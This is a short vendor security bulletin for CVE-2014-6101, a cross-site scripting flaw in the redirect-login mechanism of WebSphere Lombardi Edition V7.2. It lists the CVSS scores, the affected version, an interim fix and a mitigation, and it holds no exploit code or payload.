Security Bulletin: Cross-site scripting vulnerability in WebSphere Lombardi Edition redirect-login mechanism (CVE-2014-6101)

Summary

WebSphere Lombardi Edition uses a mechanism to silently login users who have previously authenticated themselves. This mechanism is vulnerable to cross-site scripting attacks.

Vulnerability Details

CVE ID:CVE-2014-6101

**DESCRIPTION:**WebSphere Lombardi Edition is vulnerable to cross-site scripting, which is caused by the improper validation of user-supplied input. A remote attacker might exploit this vulnerability using a specially crafted URL to execute a script in a user’s web browser within the security context of the hosting web site after the URL is clicked. An attacker might use this vulnerability to steal the user’s cookie-based authentication credentials.

CVSS Base Score: 4.3
CVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/96024&gt; for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Affected Products and Versions

WebSphere Lombardi Edition V7.2

Remediation/Fixes

Install the interim fix for APAR IT04509 as appropriate for your current WebSphere Lombardi Edition version.

• WebSphere Lombardi Edition
• If you are on earlier unsupported releases, IBM strongly recommends to upgrade.

Workarounds and Mitigations

The attack requires a user to access a malicious URL that the attacker has constructed for this purpose. Advise your users not to click links of unknown or untrusted origins.